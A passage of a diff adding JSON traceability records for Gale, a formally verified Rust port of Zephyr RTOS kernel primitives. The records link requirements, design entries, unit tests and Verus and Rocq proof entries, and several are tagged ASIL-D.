+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Stack Sentinel Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "The sum of used bytes and free space always equals the buffer size.\n",
+      "id": "SWREQ-PP-PP09",
+      "links": [
+        {
+          "target": "SYSREQ-PP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PP-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "conservation",
+        "asil-d"
+      ],
+      "title": "PP9: conservation: used + free == size",
+      "type": "sw-req"
+    },
+    {
+      "description": "When put is called, the item count increments by 1. Maps to queue.c:197-213.\n",
+      "id": "SWREQ-FI-FI02",
+      "links": [
+        {
+          "target": "SYSREQ-FI-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FI-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fifo",
+        "put",
+        "asil-d"
+      ],
+      "title": "FI2: put increments count by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide blocking put and get operations on a message queue, with configurable timeout periods allowing threads to wait until space or data is available.\n",
+      "id": "ZEP-SRS-MQ-3",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MQ",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-MQ-MQ05",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-MQ-MQ06",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "msgq"
+      ],
+      "title": "Zephyr: Message Queue Blocking Put/Get With Timeout",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Each reason code maps to a unique FatalReason variant. No two codes produce the same variant.\n",
+      "id": "SWREQ-FT-FT04",
+      "links": [
+        {
+          "target": "SYSREQ-FT-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FT-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fatal",
+        "distinct",
+        "asil-d"
+      ],
+      "title": "FT4: reason codes are distinct (no overlap)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS poll signal shall wake all threads currently polling on the signal object, delivering a result value to each woken poller.\n",
+      "id": "ZEP-SRS-PL-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-PL",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-PL-PL04",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-PL-PL05",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-PL-PL06",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "poll"
+      ],
+      "title": "Zephyr: Poll Signal Wakes Pollers",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "sys_clock_announce advances curr_tick by ticks and fires all timeouts whose expiry <= curr_tick, in ascending expiry order. Maps to timeout.c:221-270.\n",
+      "id": "SWREQ-TO-TO05",
+      "links": [
+        {
+          "target": "SYSREQ-TO-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "announce",
+        "asil-d"
+      ],
+      "title": "TO5: announce processes expired timeouts in order",
+      "type": "sw-req"
+    },
+    {
+      "description": "Constructs a mutex with empty WaitQueue, owner=None, lock_count=0.\n",
+      "id": "SWDD-MUT-INIT",
+      "links": [
+        {
+          "target": "SWARCH-MUT-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MUT-M01",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MUT-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "init"
+      ],
+      "title": "Mutex::init — z_impl_k_mutex_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "When attempting to acquire a semaphore, where the current count is zero and no timeout time was provided, the Zephyr RTOS shall return an error indicating the semaphore is busy.\n",
+      "id": "ZEP-SRS-5-11",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Semaphore acquisition no wait error handling",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Event bitmask model with post/set/clear/set_masked/wait_any/wait_all. Tracks a u32 bitmask for event signaling validation. Actual thread blocking stays in C — Gale verifies bitwise operation correctness only. No unsafe code.\n",
+      "id": "SWARCH-EV-001",
+      "links": [
+        {
+          "target": "SWREQ-EV-EV01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-EV-EV05",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-EV-EV06",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-EV-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "architecture"
+      ],
+      "title": "Event module (gale::event)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "A timer status counter that matches the Zephyr k_timer API semantics: initialization, start (reset status), stop (reset status and clear running), expire (increment status), and status_get (atomic read and reset).  Must maintain non-negative status and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-TM-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-TM",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "kernel"
+      ],
+      "title": "Timer status counter with init/start/stop/expire/status_get",
+      "type": "system-req"
+    },
+    {
+      "description": "k_heap_free frees memory back to the sys_heap, then unpends all threads waiting on the heap's wait queue and triggers rescheduling if any were woken. Maps to kheap.c:206-218.\n",
+      "id": "SWREQ-KH-KH05",
+      "links": [
+        {
+          "target": "SYSREQ-KH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "kheap",
+        "free",
+        "wake",
+        "asil-d"
+      ],
+      "title": "KH5: free unpends all waiters and reschedules",
+      "type": "sw-req"
+    },
+    {
+      "description": "Unit tests in plain/src/lifo.rs covering init, put/get operations, empty boundary condition, put-get roundtrip, and count tracking.\n",
+      "id": "UV-LI-001",
+      "links": [
+        {
+          "target": "SWDD-LI-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-LI-PUT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-LI-GET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "LIFO unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Verus specifications in src/mbox.rs with requires/ensures clauses that formally verify mailbox properties (MB01-MB06) via SMT solving. Proves validate_send parameter checking, match_check correctness, data_exchange_size clamping, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-MB-001",
+      "links": [
+        {
+          "target": "SWREQ-MB-MB01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MB-MB02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MB-MB03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MB-MB04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MB-MB05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MB-MB06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Mailbox Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Each excluded module shall have a documented rationale in the design artifacts explaining why it is not safety-relevant. The rationale must confirm: no state machines, no arithmetic that could overflow, and no synchronization primitives.\n",
+      "id": "SWREQ-TRIV-T01",
+      "links": [
+        {
+          "target": "SYSREQ-TRIV-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "trivial",
+        "documentation"
+      ],
+      "title": "TRIV1: Documented exclusion rationale for each trivial module",
+      "type": "sw-req"
+    },
+    {
+      "description": "When initializing a counting semaphore, the maximum permitted count a semaphore can have shall be set.\n",
+      "id": "ZEP-SRS-5-4",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Initialialization with maximum count value",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The LIFO item count is always non-negative. This is the fundamental invariant maintained across all operations.\n",
+      "id": "SWREQ-LI-LI01",
+      "links": [
+        {
+          "target": "SYSREQ-LI-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-LI-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "lifo",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "LI1: 0 <= count (non-negative count)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The stack count is always between 0 and capacity inclusive. This is the fundamental invariant maintained across all operations. Maps to stack.c:27-190.\n",
+      "id": "SWREQ-SK-SK01",
+      "links": [
+        {
+          "target": "SYSREQ-SK-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SK-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "SK1: 0 <= count <= capacity (bounds invariant)",
+      "type": "sw-req"
+    },
+    {
+      "description": "When take is called with K_NO_WAIT and count == 0, returns -EBUSY without modifying the semaphore. Maps to z_impl_k_sem_take lines 150-154 in kernel/sem.c.\n",
+      "id": "SWREQ-SEM-P06",
+      "links": [
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-5-11",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "take",
+        "asil-d"
+      ],
+      "title": "P6: take when count == 0, no wait, returns -EBUSY",
+      "type": "sw-req"
+    },
+    {
+      "description": "A byte stream pipe that matches the Zephyr k_pipe API semantics: initialization, write_check (validate and commit bytes), read_check (validate and consume bytes), reset, and close. Must maintain used/size capacity bounds and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-PP-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-PP",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "kernel"
+      ],
+      "title": "Byte stream pipe with read/write/reset/close",
+      "type": "system-req"
+    },
+    {
+      "description": "When z_time_slice detects an expired slice on an eligible thread that is not prevented from running, the thread is moved to the end of its priority queue for round-robin rotation. Maps to timeslicing.c:131-161.\n",
+      "id": "SWREQ-TS-TS04",
+      "links": [
+        {
+          "target": "SYSREQ-TS-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TS-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "expiry",
+        "asil-d"
+      ],
+      "title": "TS4: expired slice triggers move_to_end_of_prio_q",
+      "type": "sw-req"
+    },
+    {
+      "description": "A stack configuration validator that matches Zephyr's setup_thread_stack semantics: validates base, size, guard_size, alignment constraints. Must prevent stack overflow via guard region validation and reject invalid configurations.\n",
+      "id": "SYSREQ-SKS-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack-config",
+        "kernel"
+      ],
+      "title": "Thread stack geometry validation model",
+      "type": "system-req"
+    },
+    {
+      "description": "Stopping a CPU decrements the active count but never below 1, preserving CPU 0 as always active.\n",
+      "id": "SWREQ-SM-SM03",
+      "links": [
+        {
+          "target": "SYSREQ-SM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SM-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "smp",
+        "stop",
+        "asil-d"
+      ],
+      "title": "SM3: stop_cpu when active > 1 decrements (CPU 0 never stops)",
+      "type": "sw-req"
+    },
+    {
+      "description": "A condition variable that matches the Zephyr k_condvar API semantics: initialization, signal (wake one), broadcast (wake all), and wait (block on condition).  Must maintain priority-ordered wait queue and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-CV-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-CV",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "kernel"
+      ],
+      "title": "Condition variable with signal/broadcast/wait",
+      "type": "system-req"
+    },
+    {
+      "description": "When a poll event becomes ready, its state is updated to the specified ready state value. Maps to poll.c:223-228.\n",
+      "id": "SWREQ-PL-PL03",
+      "links": [
+        {
+          "target": "SYSREQ-PL-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PL-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "ready",
+        "asil-d"
+      ],
+      "title": "PL3: set_event_ready transitions state to ready",
+      "type": "sw-req"
+    },
+    {
+      "description": "A priority-based scheduler that matches the Zephyr scheduler semantics: run queue management, priority-ordered selection, preemption decisions, thread state machine, suspend/resume, and wait queue integration. Must maintain scheduling invariants and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-SC-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-SC",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "kernel"
+      ],
+      "title": "Priority scheduler with run queue and preemption",
+      "type": "system-req"
+    },
+    {
+      "description": "Every integer arithmetic operation in the kernel primitives is proven to not overflow by Verus SMT proofs.  This sub-goal directly addresses system constraint SC-6 (overflow-checked operations) and hazard H-6 (integer overflow in timeout/timer arithmetic).\n",
+      "id": "G-2",
+      "links": [
+        {
+          "target": "G-1",
+          "type": "sub-goal-of"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "safety",
+        "asil-d",
+        "arithmetic",
+        "overflow"
+      ],
+      "title": "All kernel arithmetic is overflow-free",
+      "type": "safety-goal"
+    },
+    {
+      "description": "When wait is called and the atomic value equals expected, the calling thread is added to the wait queue and blocks. Maps to futex.c:69-94.\n",
+      "id": "SWREQ-FX-FX01",
+      "links": [
+        {
+          "target": "SYSREQ-FX-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FX-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "futex",
+        "wait",
+        "asil-d"
+      ],
+      "title": "FX1: wait blocks only when val == expected",
+      "type": "sw-req"
+    },
+    {
+      "description": "Constructs a condition variable with an empty WaitQueue.\n",
+      "id": "SWDD-CV-INIT",
+      "links": [
+        {
+          "target": "SWARCH-CV-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-CV-C01",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-CV-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "init"
+      ],
+      "title": "CondVar::init — condvar initialization",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "If power is lost during an ATE write (header or data partially written to flash), the partial ATE will have an invalid CRC on next read.  The recovery procedure detects this via CRC mismatch and discards the partial entry.  Previously committed entries remain intact because they occupy earlier flash addresses that were not being written at the time of power loss.\n",
+      "id": "SWREQ-ZMS-P07",
+      "links": [
+        {
+          "target": "SYSREQ-ZMS-003",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-ZMS-004",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zms",
+        "power-loss",
+        "partial-write",
+        "crc",
+        "asil-d"
+      ],
+      "title": "P7: Power-loss during ATE write detected by CRC (partial write safe)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Validate msg_size > 0, max_msgs > 0, and msg_size * max_msgs does not overflow u32. Initialize read_idx, write_idx, used_msgs to 0.\n",
+      "id": "SWDD-MQ-INIT",
+      "links": [
+        {
+          "target": "SWARCH-MQ-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MQ-MQ01",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MQ-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "init"
+      ],
+      "title": "MsgQ::init — k_msgq_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Reset used_msgs to 0, set read_idx = write_idx. Return the previous used count.\n",
+      "id": "SWDD-MQ-PURGE",
+      "links": [
+        {
+          "target": "SWARCH-MQ-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MQ-MQ11",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ12",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MQ-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "purge"
+      ],
+      "title": "MsgQ::purge — z_impl_k_msgq_purge port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Unit tests in plain/src/timer.rs covering init validation, start/stop lifecycle, expire increment, status_get read-and-reset, one-shot vs periodic mode, and boundary conditions.\n",
+      "id": "UV-TM-001",
+      "links": [
+        {
+          "target": "SWDD-TM-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TM-START",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TM-STOP",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TM-EXPIRE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TM-STATUS-GET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Timer unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "After garbage collection completes, every key-value pair that was live (most recent, non-deleted entry for each key) before GC is present in the compacted sector.  GC may discard superseded entries and deleted entries but shall never discard the latest version of a live key.\n",
+      "id": "SWREQ-ZMS-P04",
+      "links": [
+        {
+          "target": "SYSREQ-ZMS-003",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zms",
+        "gc",
+        "data-preservation",
+        "asil-d"
+      ],
+      "title": "P4: GC preserves all live data (no data loss during compaction)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Unit tests in plain/src/timeslice.rs covering per-thread vs global slice selection, eligibility determination for idle/cooperative/ preemptible threads, reset re-arming logic, expiry-triggered rotation, and global configuration updates.\n",
+      "id": "UV-TS-001",
+      "links": [
+        {
+          "target": "SWDD-TS-SLICE-TIME",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TS-SLICE-SIZE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TS-RESET",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TS-ON-TICK",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Timeslice unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Verus specifications in src/spinlock.rs with requires/ensures clauses that formally verify spinlock properties (SL1-SL5) via SMT solving. Proves acquire/release correctness, nested depth tracking, ownership invariants, and non-owner rejection. Executed via: bazel test //:verus_test\n",
+      "id": "FV-SL-001",
+      "links": [
+        {
+          "target": "SWREQ-SL-SL01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SL-SL02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SL-SL03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SL-SL04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SL-SL05",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Spinlock Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Rocq proof scripts in proofs/msgq_proofs.v targeting message queue invariant preservation (ring buffer index safety, put/get modular arithmetic, purge reset, conservation) via theorem proving on the coq_of_rust translation. Independent verification path from Verus. Executed via: bazel test //proofs:msgq_proofs_test\n",
+      "id": "FV-MQ-002",
+      "links": [
+        {
+          "target": "SWREQ-MQ-MQ01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ11",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "rocq",
+        "theorem-proving",
+        "swe-6"
+      ],
+      "title": "MsgQ Rocq theorem proofs (coq_of_rust)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Full Zephyr kernel FIFO test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_FIFO=y. Tests exercise the complete k_fifo API through the Gale FFI/C shim layer, validating functional equivalence with upstream Zephyr. Test suite: zephyr/tests/kernel/fifo/fifo_api.\n",
+      "id": "SV-FI-001",
+      "links": [
+        {
+          "target": "SYSREQ-FI-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "FIFO Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "A chunk-level heap allocator model that matches the Zephyr sys_heap API semantics: initialization, allocation, free, aligned allocation, split, merge, coalesce, and realloc.  Must maintain chunk conservation, prevent double-free, and never exhibit arithmetic overflow.\n",
+      "id": "SYSREQ-HP-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "kernel"
+      ],
+      "title": "Sys_heap chunk allocator with alloc/free/split/merge",
+      "type": "system-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's SMP subsystem. Contains z_smp_init, k_smp_cpu_start, k_smp_cpu_resume, z_smp_global_lock, z_smp_global_unlock. The Gale port models CPU state tracking only — IPI signaling and arch CPU start stay in C.\n",
+      "id": "PROV-SM-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "smp",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/smp.c — SMP CPU state management",
+      "type": "source-provenance"
+    },
+    {
+      "description": "The compilation pipeline from Gale source to ARM binary is formally verified at every stage: Gale source (Verus/Rocq) → WASM (Meld fusion) → optimized WASM (Loom Z3 validation) → ARM ELF (Synth Rocq proofs).  No unverified transformation gap exists between verified source and deployed binary.\n",
+      "id": "SYSREQ-KILN-002",
+      "links": [
+        {
+          "target": "STKH-002",
+          "type": "derives-from"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "verified-pipeline",
+        "end-to-end",
+        "synth",
+        "loom"
+      ],
+      "title": "End-to-end verified compilation pipeline",
+      "type": "system-req"
+    },
+    {
+      "description": "Timeout tick arithmetic model with add/abort/remaining/expires/announce. Tracks curr_tick (u64), timeout list ordering, and expiry computation. Actual DLL management and callback invocation stays in C — Gale verifies tick arithmetic and ordering invariants only. No unsafe code.\n",
+      "id": "SWARCH-TO-001",
+      "links": [
+        {
+          "target": "SWREQ-TO-TO01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-TO-TO05",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-TO-TO06",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-TO-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "architecture"
+      ],
+      "title": "Timeout module (gale::timeout)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "When get is called and count == 0, returns ENOENT without modifying the queue state. Maps to queue.c:335-370.\n",
+      "id": "SWREQ-LI-LI04",
+      "links": [
+        {
+          "target": "SYSREQ-LI-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-LI-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "lifo",
+        "get",
+        "error",
+        "asil-d"
+      ],
+      "title": "LI4: get when empty returns ENOENT, state unchanged",
+      "type": "sw-req"
+    },
+    {
+      "description": "A device can only be initialized after all its dependencies have been successfully initialized.\n",
+      "id": "SWREQ-DI-DI04",
+      "links": [
+        {
+          "target": "SYSREQ-DI-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "device-init",
+        "deps",
+        "asil-d"
+      ],
+      "title": "DI4: all deps initialized before dependent",
+      "type": "sw-req"
+    },
+    {
+      "description": "A ring buffer index model that matches Zephyr's ring_buffer.c semantics: init, put, get, peek, reset.  Must maintain index bounds, capacity invariant, and modular arithmetic consistency.\n",
+      "id": "SYSREQ-RB-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "lib"
+      ],
+      "title": "Lock-free ring buffer index model",
+      "type": "system-req"
+    },
+    {
+      "description": "Counting semaphore with init/give/try_take/take_blocking/reset. Owns a WaitQueue for blocked threads, a u32 count, and a u32 limit. No unsafe code. no_std compatible via heapless.\n",
+      "id": "SWARCH-SEM-001",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-SEM-P03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-SEM-P05",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-SEM-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "architecture"
+      ],
+      "title": "Semaphore module (gale::sem)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "k_sched_time_slice_set updates the global slice duration and maximum eligible priority, then resets the current thread's slice unless it defines its own per-thread slice. Maps to timeslicing.c:97-115.\n",
+      "id": "SWREQ-TS-TS05",
+      "links": [
+        {
+          "target": "SYSREQ-TS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "config",
+        "asil-d"
+      ],
+      "title": "TS5: global set updates slice_ticks and slice_max_prio",
+      "type": "sw-req"
+    },
+    {
+      "description": "If count < capacity: increment count, return OK. Otherwise return ENOMEM.\n",
+      "id": "SWDD-SK-PUSH",
+      "links": [
+        {
+          "target": "SWARCH-SK-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SK-SK02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SK-SK04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SK-SK05",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SK-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "push"
+      ],
+      "title": "Stack::push — z_impl_k_stack_push port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Full Zephyr settings/ZMS test suite executed on qemu_cortex_m3 with CONFIG_GALE_ZMS=y. Tests exercise the ZMS NVS-compatible API (zms_mount, zms_write, zms_read, zms_delete) through the Gale integration layer, validating functional equivalence with upstream Zephyr ZMS. Test suite: zephyr/tests/subsys/settings/functional.\n",
+      "id": "SV-ZMS-001",
+      "links": [
+        {
+          "target": "SYSREQ-ZMS-001",
+          "type": "verifies"
+        },
+        {
+          "target": "SYSREQ-ZMS-002",
+          "type": "verifies"
+        },
+        {
+          "target": "SYSREQ-ZMS-003",
+          "type": "verifies"
+        },
+        {
+          "target": "SYSREQ-ZMS-004",
+          "type": "verifies"
+        },
+        {
+          "target": "SYSREQ-ZMS-005",
+          "type": "verifies"
+        },
+        {
+          "target": "SYSREQ-ZMS-006",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5",
+        "zms"
+      ],
+      "title": "ZMS Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's memory domain subsystem. Contains check_add_partition, k_mem_domain_init, k_mem_domain_add_partition, k_mem_domain_remove_partition. The Gale port models partition slot arithmetic and non-overlap invariant only — MPU/MMU programming stays in C.\n",
+      "id": "PROV-MD-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "mem-domain",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/mem_domain.c — memory domain partition management",
+      "type": "source-provenance"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a global SMP lock mechanism ensuring mutual exclusion across CPUs, with lock/unlock/release semantics and correct nesting behavior.\n",
+      "id": "ZEP-SRS-SM-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-SM",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-SM-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "smp"
+      ],
+      "title": "Zephyr: SMP Global Lock",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Yielding moves the current thread to the end of its priority level's queue, allowing same-priority threads to run. Maps to sched.c:284-292.\n",
+      "id": "SWREQ-SC-SC09",
+      "links": [
+        {
